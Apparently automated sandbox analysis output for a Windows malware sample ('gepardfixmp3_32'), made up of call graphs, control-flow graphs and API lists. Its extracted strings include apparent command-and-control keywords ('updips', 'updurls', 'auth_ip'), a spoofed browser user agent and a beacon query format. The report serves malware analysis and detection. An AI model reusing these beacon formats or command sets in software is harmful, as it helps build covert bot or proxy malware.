20435->20438 20437 2c33bac 20440 2c34589 RaiseException 20438->20440 20440->20437 20441 4021a7 20442 402210 RegCreateKeyExA 20441->20442 20444 402168 20445 4026f2 OpenSCManagerA 20444->20445 20446 40288f 20445->20446 20447 2c2f9ab LoadLibraryA 20448 2c2f9d4 GetProcAddress 20447->20448 20449 2c2fa8e 20447->20449 20450 2c2fa87 FreeLibrary 20448->20450 20452 2c2f9e8 20448->20452 20450->20449 20451 2c2f9fa GetAdaptersInfo 20451->20452 20452->20451 20453 2c2fa82 20452->20453 20454 2c33b5c _Allocate 60 API calls 20452->20454 20453->20450 20454->20452 20455 40d5ab Sleep 20456 2c70c28 20457 2c8b02a CreateFileA 20456->20457 20458 402eb0 GetVersion 20482 403ff4 HeapCreate 20458->20482 20460 402f0f 20461 402f14 20460->20461 20462 402f1c 20460->20462 20557 402fcb 20461->20557 20494 403cd4 20462->20494 20466 402f24 GetCommandLineA 20508 403ba2 20466->20508 20470 402f3e 20540 40389c 20470->20540 20472 402f43 20473 402f48 GetStartupInfoA 20472->20473 20553 403844 20473->20553 20475 402f5a GetModuleHandleA 20477 402f7e 20475->20477 20563 4035eb 20477->20563 20481 402f98 20483 404014 20482->20483 20484 40404a 20482->20484 20570 403eac 20483->20570 20484->20460 20487 404030 20489 40404d 20487->20489 20492 404c1c 5 API calls 20487->20492 20488 404023 20582 4043cb HeapAlloc 20488->20582 20489->20460 20491 40402d 20491->20489 20493 40403e HeapDestroy 20491->20493 20492->20491 20493->20484 20638 402fef 20494->20638 20497 403cf3 GetStartupInfoA 20505 403e04 20497->20505 20507 403d3f 20497->20507 20500 403e6b SetHandleCount 20500->20466 20501 403e2b GetStdHandle 20503 403e39 GetFileType 20501->20503 20501->20505 20502 402fef 12 API calls 20502->20507 20503->20505 20504 403db0 20504->20505 20506 403dd2 GetFileType 20504->20506 20505->20500 20505->20501 20506->20504 20507->20502 20507->20504 20507->20505 20509 403bf0 20508->20509 20510 403bbd GetEnvironmentStringsW 20508->20510 20512 403bc5 20509->20512 20513 403be1 20509->20513 20511 403bd1 GetEnvironmentStrings 20510->20511 20510->20512 20511->20513 20516 402f34 20511->20516 20514 403c09 WideCharToMultiByte 20512->20514 20515 403bfd GetEnvironmentStringsW 20512->20515 20513->20516 20517 403c83 GetEnvironmentStrings 20513->20517 20518 403c8f 20513->20518 20520 403c3d 20514->20520 20521 403c6f FreeEnvironmentStringsW 20514->20521 20515->20514 20515->20516 20531 403955 20516->20531 20517->20516 20517->20518 20522 402fef 12 API calls 20518->20522 20523 402fef 12 API calls 20520->20523 20521->20516 20529 403caa 20522->20529 20524 403c43 20523->20524 20524->20521 20525 403c4c WideCharToMultiByte 20524->20525 20527 403c66 20525->20527 20528 403c5d 20525->20528 20526 403cc0 FreeEnvironmentStringsA 20526->20516 20527->20521 20530 4030a1 7 API calls 20528->20530 20529->20526 20530->20527 20532 403967 20531->20532 20533 40396c GetModuleFileNameA 20531->20533 20667 4061b4 20532->20667 20535 40398f 20533->20535 20536 402fef 12 API calls 20535->20536 20537 4039b0 20536->20537 20538 4039c0 20537->20538 20539 402fa6 7 API calls 20537->20539 20538->20470 20539->20538 20541 4038a9 20540->20541 20543 4038ae 20540->20543 20542 4061b4 19 API calls 20541->20542 20542->20543 20544 402fef 12 API calls 20543->20544 20545 4038db 20544->20545 20546 402fa6 7 API calls 20545->20546 20551 4038ef 20545->20551 20546->20551 20547 4030a1 7 API calls 20548 40393e 20547->20548 20548->20472 20549 403932 20549->20547 20550 402fef 12 API calls 20550->20551 20551->20549 20551->20550 20552 402fa6 7 API calls 20551->20552 20552->20551 20554 40384d 20553->20554 20556 403852 20553->20556 20555 4061b4 19 API calls 20554->20555 20555->20556 20556->20475 20558 402fd4 20557->20558 20559 402fd9 20557->20559 20560 404224 7 API calls 20558->20560 20561 40425d 7 API calls 20559->20561 20560->20559 20562 402fe2 ExitProcess 20561->20562 20691 40360d 20563->20691 20566 4036c0 20567 4036cc 20566->20567 20568 4037f5 UnhandledExceptionFilter 20567->20568 20569 4036e0 20567->20569 20568->20569 20569->20481 20569->20569 20584 402d40 20570->20584 20573 403ed5 20574 403eef GetEnvironmentVariableA 20573->20574 20575 403ee7 20573->20575 20577 403f0e 20574->20577 20581 403fcc 20574->20581 20575->20487 20575->20488 20578 403f53 GetModuleFileNameA 20577->20578 20579 403f4b 20577->20579 20578->20579 20579->20581 20586 4061d0 20579->20586 20581->20575 20589 403e7f GetModuleHandleA 20581->20589 20583 4043e7 20582->20583 20583->20491 20585 402d4c GetVersionExA 20584->20585 20585->20573 20585->20574 20591 4061e7 20586->20591 20590 403e96 20589->20590 20590->20575 20593 4061ff 20591->20593 20594 40622f 20593->20594 20598 4053a6 20593->20598 20595 4053a6 6 API calls 20594->20595 20597 4061e3 20594->20597 20602 4073ab 20594->20602 20595->20594 20597->20581 20599 4053b8 20598->20599 20600 4053c4 20598->20600 20599->20593 20608 40670e 20600->20608 20603 4073d6 20602->20603 20607 4073b9 20602->20607 20604 4073f2 20603->20604 20605 4053a6 6 API calls 20603->20605 20604->20607 20620 406857 20604->20620 20605->20604 20607->20594 20609 406757 20608->20609 20610 40673f GetStringTypeW 20608->20610 20611 406782 GetStringTypeA 20609->20611 20612 4067a6 20609->20612 20610->20609 20613 40675b GetStringTypeA 20610->20613 20615 406843 20611->20615 20612->20615 20616 4067bc MultiByteToWideChar 20612->20616 20613->20609 20613->20615 20615->20599 20616->20615 20617 4067e0 20616->20617 20617->20615 20618 40681a MultiByteToWideChar 20617->20618 20618->20615 20619 406833 GetStringTypeW 20618->20619 20619->20615 20621 406887 LCMapStringW 20620->20621 20622 4068a3 20620->20622 20621->20622 20623 4068ab LCMapStringA 20621->20623 20624 406909 20622->20624 20625 4068ec LCMapStringA 20622->20625 20623->20622 20632 4069e5 20623->20632 20626 40691f MultiByteToWideChar 20624->20626 20624->20632 20625->20632 20627 406949 20626->20627 20626->20632 20628 40697f MultiByteToWideChar 20627->20628 20627->20632 20629 406998 LCMapStringW 20628->20629 20628->20632 20630 4069b3 20629->20630 20629->20632 20631 4069b9 20630->20631 20634 4069f9 20630->20634 20631->20632 20633 4069c7 LCMapStringW 20631->20633 20632->20607 20633->20632 20634->20632 20635 406a31 LCMapStringW 20634->20635 20635->20632 20636 406a49 WideCharToMultiByte 20635->20636 20636->20632 20639 403001 12 API calls 20638->20639 20640 402ffe 20639->20640 20640->20497 20641 402fa6 20640->20641 20642 402fb4 20641->20642 20643 402faf 20641->20643 20653 40425d 20642->20653 20647 404224 20643->20647 20648 40422e 20647->20648 20649 40425d 7 API calls 20648->20649 20652 40425b 20648->20652 20650 404245 20649->20650 20651 40425d 7 API calls 20650->20651 20651->20652 20652->20642 20656 404270 20653->20656 20654 402fbd 20654->20497 20655 404387 20658 40439a GetStdHandle WriteFile 20655->20658 20656->20654 20656->20655 20657 4042b0 20656->20657 20657->20654 20659 4042bc GetModuleFileNameA 20657->20659 20658->20654 20660 4042d4 20659->20660 20662 406578 20660->20662 20663 406585 LoadLibraryA 20662->20663 20665 4065c7 20662->20665 20664 406596 GetProcAddress 20663->20664 20663->20665 20664->20665 20666 4065ad GetProcAddress GetProcAddress 20664->20666 20665->20654 20666->20665 20668 4061bd 20667->20668 20669 4061c4 20667->20669 20671 405df0 20668->20671 20669->20533 20678 405f89 20671->20678 20673 405f7d 20673->20669 20676 405e33 GetCPInfo 20677 405e47 20676->20677 20677->20673 20683 40602f GetCPInfo 20677->20683 20679 405fa9 20678->20679 20680 405f99 GetOEMCP 20678->20680 20681 405e01 20679->20681 20682 405fae GetACP 20679->20682 20680->20679 20681->20673 20681->20676 20681->20677 20682->20681 20687 406052 20683->20687 20690 40611a 20683->20690 20684 40670e 6 API calls 20685 4060ce 20684->20685 20686 406857 9 API calls 20685->20686 20688 4060f2 20686->20688 20687->20684 20689 406857 9 API calls 20688->20689 20689->20690 20690->20673 20692 403619 GetCurrentProcess TerminateProcess 20691->20692 20693 40362a 20691->20693 20692->20693 20694 402f87 20693->20694 20695 403694 ExitProcess 20693->20695 20694->20566 20696 2c5e7b4 20697 2c5e7bc 20696->20697 20699 2c32fbc 59 API calls 20697->20699 20698 2c77101 20699->20698 20700 402574 RegOpenKeyExA 20701 4021a0 20700->20701 20702 4021b7 lstrcmpiW 20704 40d75c 20702->20704 20703 40d9bb lstrcmpiW 20704->20703 20705 40d1ff CopyFileA 20706 2c72a38 CloseHandle

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 2c272ab-2c272c3 InternetOpenA 1 2c27389-2c2738f 0->1 2 2c272c9-2c27340 InternetSetOptionA * 3 call 2c34b00 InternetOpenUrlA 0->2 4 2c27391-2c27397 1->4 5 2c273ab-2c273b9 1->5 14 2c27382-2c27383 InternetCloseHandle 2->14 15 2c27342 2->15 9 2c27399-2c2739b 4->9 10 2c2739d-2c273aa call 2c253ec 4->10 6 2c266f4-2c266f6 5->6 7 2c273bf-2c273e3 call 2c34b00 call 2c2439c 5->7 12 2c266f8-2c266fd 6->12 13 2c266ff-2c26701 6->13 7->6 31 2c273e9-2c27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c3234c 7->31 9->5 10->5 18 2c26708 Sleep 12->18 19 2c26703 13->19 20 2c2670e-2c26742 RtlEnterCriticalSection RtlLeaveCriticalSection 13->20 14->1 21 2c27346-2c2736c InternetReadFile 15->21 18->20 19->18 26 2c26792 20->26 27 2c26744-2c26750 20->27 24 2c27377-2c2737e InternetCloseHandle 21->24 25 2c2736e-2c27375 21->25 24->14 25->21 30 2c26796 26->30 27->26 29 2c26752-2c2675f 27->29 32 2c26761-2c26765 29->32 33 2c26767-2c26768 29->33 30->0 38 2c27419-2c2742b call 2c3234c 31->38 39 2c2746d-2c27488 call 2c3234c 31->39 35 2c2676c-2c26790 call 2c34b00 * 2 32->35 33->35 35->30 38->39 49 2c2742d-2c2743f call 2c3234c 38->49 47 2c27742-2c27754 call 2c3234c 39->47 48 2c2748e-2c27490 39->48 56 2c27756-2c27758 47->56 57 2c2779d-2c277af call 2c3234c 47->57 48->47 51 2c27496-2c27548 call 2c32fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c34b00 * 5 call 2c2439c * 2 48->51 49->39 59 2c27441-2c27453 call 2c3234c 49->59 115 2c27585 51->115 116 2c2754a-2c2754c 51->116 56->57 62 2c2775a-2c27798 call 2c34b00 RtlEnterCriticalSection RtlLeaveCriticalSection 56->62 68 2c277d0-2c277e2 call 2c3234c 57->68 69 2c277b1-2c277cb call 2c261f5 call 2c26303 call 2c2640e 57->69 59->39 70 2c27455-2c27467 call 2c3234c 59->70 62->6 83 2c27b00-2c27b12 call 2c3234c 68->83 84 2c277e8-2c277ea 68->84 69->6 70->6 70->39 83->6 95 2c27b18-2c27b46 call 2c32fbc call 2c34b00 call 2c2439c 83->95 84->83 88 2c277f0-2c27807 call 2c2439c 84->88 88->6 97 2c2780d-2c278db call 2c32428 call 2c21ba7 88->97 117 2c27b48-2c27b4a call 2c2534d 95->117 118 2c27b4f-2c27b56 call 2c32f84 95->118 113 2c278e2-2c27903 RtlEnterCriticalSection 97->113 114 2c278dd call 2c2143f 97->114 121 2c27905-2c2790c 113->121 122 2c2790f-2c27973 RtlLeaveCriticalSection call 2c23c67 call 2c23d7e call 2c2833f 113->122 114->113 119 2c27589-2c275b7 call 2c32fbc call 2c34b00 call 2c2439c 115->119 116->115 123 2c2754e-2c27560 call 2c3234c 116->123 117->118 118->6 146 2c275f8-2c27601 call 2c32f84 119->146 147 2c275b9-2c275c8 call 2c335f6 119->147 121->122 144 2c27ae7-2c27afb call 2c29007 122->144 145 2c27979-2c279c1 call 2c2a729 122->145 123->115 135 2c27562-2c27583 call 2c2439c 123->135 135->119 144->6 156 2c27ab1-2c27ae2 call 2c283ee call 2c233b2 145->156 157 2c279c7-2c279ce 145->157 158 2c27607-2c2761f call 2c33b5c 146->158 159 2c27738-2c2773b 146->159 147->146 160 2c275ca 147->160 156->144 162 2c279d1-2c279d6 157->162 171 2c27621-2c27629 call 2c2973b 158->171 172 2c2762b 158->172 159->47 164 2c275cf-2c275e1 call 2c32860 160->164 162->162 166 2c279d8-2c27a23 call 2c2a729 162->166 174 2c275e3 164->174 175 2c275e6-2c275f6 call 2c335f6 164->175 166->156 180 2c27a29-2c27a2f 166->180 178 2c2762d-2c276e5 call 2c2a853 call 2c23863 call 2c25119 call 2c23863 call 2c2aaf9 call 2c2ac13 171->178 172->178 174->175 175->146 175->164 202 2c276e7 call 2c2380b 178->202 203 2c276ec-2c27717 Sleep call 2c31900 178->203 185 2c27a32-2c27a37 180->185 185->185 187 2c27a39-2c27a74 call 2c2a729 185->187 187->156 193 2c27a76-2c27ab0 call 2c2d11b 187->193 193->156 202->203 207 2c27723-2c27731 203->207 208 2c27719-2c27722 call 2c24100 203->208 207->159 210 2c27733 call 2c2380b 207->210 208->207 210->159
                                                            APIs
                                                            • Sleep.KERNEL32(0000EA60), ref: 02C26708
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C26713
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C26724
                                                            • _memset.LIBCMT ref: 02C26779
                                                            • _memset.LIBCMT ref: 02C26788
                                                            • InternetOpenA.WININET(?), ref: 02C272B5
                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C272DD
                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C272F5
                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C2730D
                                                            • _memset.LIBCMT ref: 02C2731D
                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02C27336
                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C27358
                                                            • InternetCloseHandle.WININET(00000000), ref: 02C27378
                                                            • InternetCloseHandle.WININET(00000000), ref: 02C27383
                                                            • _memset.LIBCMT ref: 02C273CB
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C273EE
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C273FF
                                                            • _malloc.LIBCMT ref: 02C27498
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C274AA
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C274B6
                                                            • _memset.LIBCMT ref: 02C274D0
                                                            • _memset.LIBCMT ref: 02C274DF
                                                            • _memset.LIBCMT ref: 02C274EF
                                                            • _memset.LIBCMT ref: 02C27502
                                                            • _memset.LIBCMT ref: 02C27518
                                                            • _malloc.LIBCMT ref: 02C2758E
                                                            • _memset.LIBCMT ref: 02C2759F
                                                            • _strtok.LIBCMT ref: 02C275BF
                                                            • _swscanf.LIBCMT ref: 02C275D6
                                                            • _strtok.LIBCMT ref: 02C275ED
                                                            • _free.LIBCMT ref: 02C275F9
                                                            • Sleep.KERNEL32(000007D0), ref: 02C276F1
                                                            • _memset.LIBCMT ref: 02C27765
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C27772
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C27784
                                                            • _sprintf.LIBCMT ref: 02C27822
                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C278E6
                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C2791A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                            • API String ID: 696907137-1839899575
                                                            • Opcode ID: 7894eb519c95abf4b3008e82223777592e1b3d7bf07f85a019e76f51472ff9be
                                                            • Instruction ID: a2701d90d19b07c582ea658bc33e53a5205a9df6598853b1851260f441612ec5
                                                            • Opcode Fuzzy Hash: 7894eb519c95abf4b3008e82223777592e1b3d7bf07f85a019e76f51472ff9be
                                                            • Instruction Fuzzy Hash: C03201316483919FE735AB20DC44BABBBEAAFC5314F10092DF98A97290DF70954CCB52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 481 2c2648b-2c264ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 482 2c264f3-2c266f1 GetTickCount call 2c2605a GetVersionExA call 2c34b00 call 2c32fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c34b00 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c32fbc * 4 QueryPerformanceCounter Sleep call 2c32fbc * 2 call 2c34b00 * 2 481->482 483 2c264ee call 2c242c7 481->483 526 2c266f4-2c266f6 482->526 483->482 527 2c266f8-2c266fd 526->527 528 2c266ff-2c26701 526->528 529 2c26708 Sleep 527->529 530 2c26703 528->530 531 2c2670e-2c26742 RtlEnterCriticalSection RtlLeaveCriticalSection 528->531 529->531 530->529 532 2c26792 531->532 533 2c26744-2c26750 531->533 535 2c26796-2c272c3 InternetOpenA 532->535 533->532 534 2c26752-2c2675f 533->534 537 2c26761-2c26765 534->537 538 2c26767-2c26768 534->538 539 2c27389-2c2738f 535->539 540 2c272c9-2c27340 InternetSetOptionA * 3 call 2c34b00 InternetOpenUrlA 535->540 541 2c2676c-2c26790 call 2c34b00 * 2 537->541 538->541 543 2c27391-2c27397 539->543 544 2c273ab-2c273b9 539->544 552 2c27382-2c27383 InternetCloseHandle 540->552 553 2c27342 540->553 541->535 548 2c27399-2c2739b 543->548 549 2c2739d-2c273aa call 2c253ec 543->549 544->526 546 2c273bf-2c273e3 call 2c34b00 call 2c2439c 544->546 546->526 564 2c273e9-2c27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c3234c 546->564 548->544 549->544 552->539 557 2c27346-2c2736c InternetReadFile 553->557 561 2c27377-2c2737e InternetCloseHandle 557->561 562 2c2736e-2c27375 557->562 561->552 562->557 567 2c27419-2c2742b call 2c3234c 564->567 568 2c2746d-2c27488 call 2c3234c 564->568 567->568 575 2c2742d-2c2743f call 2c3234c 567->575 573 2c27742-2c27754 call 2c3234c 568->573 574 2c2748e-2c27490 568->574 582 2c27756-2c27758 573->582 583 2c2779d-2c277af call 2c3234c 573->583 574->573 577 2c27496-2c27548 call 2c32fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c34b00 * 5 call 2c2439c * 2 574->577 575->568 585 2c27441-2c27453 call 2c3234c 575->585 641 2c27585 577->641 642 2c2754a-2c2754c 577->642 582->583 588 2c2775a-2c27798 call 2c34b00 RtlEnterCriticalSection RtlLeaveCriticalSection 582->588 594 2c277d0-2c277e2 call 2c3234c 583->594 595 2c277b1-2c277bf call 2c261f5 call 2c26303 583->595 585->568 596 2c27455-2c27467 call 2c3234c 585->596 588->526 609 2c27b00-2c27b12 call 2c3234c 594->609 610 2c277e8-2c277ea 594->610 612 2c277c4-2c277cb call 2c2640e 595->612 596->526 596->568 609->526 621 2c27b18-2c27b46 call 2c32fbc call 2c34b00 call 2c2439c 609->621 610->609 614 2c277f0-2c27807 call 2c2439c 610->614 612->526 614->526 623 2c2780d-2c278db call 2c32428 call 2c21ba7 614->623 643 2c27b48-2c27b4a call 2c2534d 621->643 644 2c27b4f-2c27b56 call 2c32f84 621->644 639 2c278e2-2c27903 RtlEnterCriticalSection 623->639 640 2c278dd call 2c2143f 623->640 647 2c27905-2c2790c 639->647 648 2c2790f-2c27973 RtlLeaveCriticalSection call 2c23c67 call 2c23d7e call 2c2833f 639->648 640->639 645 2c27589-2c275b7 call 2c32fbc call 2c34b00 call 2c2439c 641->645 642->641 649 2c2754e-2c27560 call 2c3234c 642->649 643->644 644->526 672 2c275f8-2c27601 call 2c32f84 645->672 673 2c275b9-2c275c8 call 2c335f6 645->673 647->648 670 2c27ae7-2c27afb call 2c29007 648->670 671 2c27979-2c279c1 call 2c2a729 648->671 649->641 661 2c27562-2c27583 call 2c2439c 649->661 661->645 670->526 682 2c27ab1-2c27ae2 call 2c283ee call 2c233b2 671->682 683 2c279c7-2c279ce 671->683 684 2c27607-2c2761f call 2c33b5c 672->684 685 2c27738-2c2773b 672->685 673->672 686 2c275ca 673->686 682->670 688 2c279d1-2c279d6 683->688 697 2c27621-2c27629 call 2c2973b 684->697 698 2c2762b 684->698 685->573 690 2c275cf-2c275e1 call 2c32860 686->690 688->688 692 2c279d8-2c27a23 call 2c2a729 688->692 700 2c275e3 690->700 701 2c275e6-2c275f6 call 2c335f6 690->701 692->682 706 2c27a29-2c27a2f 692->706 704 2c2762d-2c276e5 call 2c2a853 call 2c23863 call 2c25119 call 2c23863 call 2c2aaf9 call 2c2ac13 697->704 698->704 700->701 701->672 701->690 728 2c276e7 call 2c2380b 704->728 729 2c276ec-2c27717 Sleep call 2c31900 704->729 711 2c27a32-2c27a37 706->711 711->711 713 2c27a39-2c27a74 call 2c2a729 711->713 713->682 719 2c27a76-2c27ab0 call 2c2d11b 713->719 719->682 728->729 733 2c27723-2c27731 729->733 734 2c27719-2c27722 call 2c24100 729->734 733->685 736 2c27733 call 2c2380b 733->736 734->733 736->685
                                                            APIs
                                                            • RtlInitializeCriticalSection.NTDLL(02C571E0), ref: 02C264BA
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C264D1
                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C264DA
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C264E9
                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C264EC
                                                            • GetTickCount.KERNEL32 ref: 02C264F8
                                                              • Part of subcall function 02C2605A: _malloc.LIBCMT ref: 02C26068
                                                            • GetVersionExA.KERNEL32(02C57038), ref: 02C26525
                                                            • _memset.LIBCMT ref: 02C26544
                                                            • _malloc.LIBCMT ref: 02C26551
                                                              • Part of subcall function 02C32FBC: __FF_MSGBANNER.LIBCMT ref: 02C32FD3
                                                              • Part of subcall function 02C32FBC: __NMSG_WRITE.LIBCMT ref: 02C32FDA
                                                              • Part of subcall function 02C32FBC: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001), ref: 02C32FFF
                                                            • _malloc.LIBCMT ref: 02C26561
                                                            • _malloc.LIBCMT ref: 02C2656C
                                                            • _malloc.LIBCMT ref: 02C26577
                                                            • _malloc.LIBCMT ref: 02C26582
                                                            • _malloc.LIBCMT ref: 02C2658D
                                                            • _malloc.LIBCMT ref: 02C26598
                                                            • _malloc.LIBCMT ref: 02C265A7
                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C265BE
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C265C7
                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C265D6
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C265D9
                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C265E4
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C265E7
                                                            • _memset.LIBCMT ref: 02C265FA
                                                            • _memset.LIBCMT ref: 02C26606
                                                            • _memset.LIBCMT ref: 02C26613
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C26621
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C2662E
                                                            • _malloc.LIBCMT ref: 02C26652
                                                            • _malloc.LIBCMT ref: 02C26660
                                                            • _malloc.LIBCMT ref: 02C26667
                                                            • _malloc.LIBCMT ref: 02C2668D
                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C266A0
                                                            • Sleep.KERNEL32 ref: 02C266AE
                                                            • _malloc.LIBCMT ref: 02C266BA
                                                            • _malloc.LIBCMT ref: 02C266C7
                                                            • _memset.LIBCMT ref: 02C266DC
                                                            • _memset.LIBCMT ref: 02C266EC
                                                            • Sleep.KERNEL32(0000EA60), ref: 02C26708
                                                            • RtlEnterCriticalSection.NTDLL(02C571E0), ref: 02C26713
                                                            • RtlLeaveCriticalSection.NTDLL(02C571E0), ref: 02C26724
                                                            • _memset.LIBCMT ref: 02C26779
                                                            • _memset.LIBCMT ref: 02C26788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                            • API String ID: 2251652938-2678694477
                                                            • Opcode ID: 81e4e2b825470ee4f8632d1a1fd0d4b04403f43ead4663068278fb4df8376630
                                                            • Instruction ID: 8d0840067bce83ae0aa3ae6a497dc981d7232fd375bf129ca4901f30ef6f2545
                                                            • Opcode Fuzzy Hash: 81e4e2b825470ee4f8632d1a1fd0d4b04403f43ead4663068278fb4df8376630
                                                            • Instruction Fuzzy Hash: F171B5B5D453609FE721AF30AC45B5BBBE8AF89710F100C2DF98597280DBB49848CF96

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 999 401b4b-401b68 LoadLibraryA 1000 401c21-401c25 999->1000 1001 401b6e-401b7f GetProcAddress 999->1001 1002 401b85-401b8e 1001->1002 1003 401c18-401c1b FreeLibrary 1001->1003 1004 401b95-401ba5 GetAdaptersInfo 1002->1004 1003->1000 1005 401ba7-401bb0 1004->1005 1006 401bdb-401be3 1004->1006 1009 401bc1-401bd7 call 402cc0 call 4018cc 1005->1009 1010 401bb2-401bb6 1005->1010 1007 401be5-401beb call 402ca6 1006->1007 1008 401bec-401bf0 1006->1008 1007->1008 1012 401bf2-401bf6 1008->1012 1013 401c15-401c17 1008->1013 1009->1006 1010->1006 1014 401bb8-401bbf 1010->1014 1012->1013 1018 401bf8-401bfb 1012->1018 1013->1003 1014->1009 1014->1010 1020 401c06-401c13 call 402c98 1018->1020 1021 401bfd-401c03 1018->1021 1020->1004 1020->1013 1021->1020
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                            • API String ID: 514930453-3667123677
                                                            • Opcode ID: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                            • Instruction ID: 38440359ad4724572ca0372a4bc8090c683b298b5ffde01d95b1867a6a9b844d
                                                            • Opcode Fuzzy Hash: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                            • Instruction Fuzzy Hash: F921B870904109AFEF119F65C9447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1050 2c2f9ab-2c2f9ce LoadLibraryA 1051 2c2f9d4-2c2f9e2 GetProcAddress 1050->1051 1052 2c2fa8e-2c2fa95 1050->1052 1053 2c2fa87-2c2fa88 FreeLibrary 1051->1053 1054 2c2f9e8-2c2f9f8 1051->1054 1053->1052 1055 2c2f9fa-2c2fa06 GetAdaptersInfo 1054->1055 1056 2c2fa08 1055->1056 1057 2c2fa3e-2c2fa46 1055->1057 1060 2c2fa0a-2c2fa11 1056->1060 1058 2c2fa48-2c2fa4e call 2c337b8 1057->1058 1059 2c2fa4f-2c2fa54 1057->1059 1058->1059 1062 2c2fa82-2c2fa86 1059->1062 1063 2c2fa56-2c2fa59 1059->1063 1064 2c2fa13-2c2fa17 1060->1064 1065 2c2fa1b-2c2fa23 1060->1065 1062->1053 1063->1062 1067 2c2fa5b-2c2fa60 1063->1067 1064->1060 1068 2c2fa19 1064->1068 1069 2c2fa26-2c2fa2b 1065->1069 1070 2c2fa62-2c2fa6a 1067->1070 1071 2c2fa6d-2c2fa78 call 2c33b5c 1067->1071 1068->1057 1069->1069 1072 2c2fa2d-2c2fa3a call 2c2f6fa 1069->1072 1070->1071 1071->1062 1077 2c2fa7a-2c2fa7d 1071->1077 1072->1057 1077->1055
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02C2F9C1
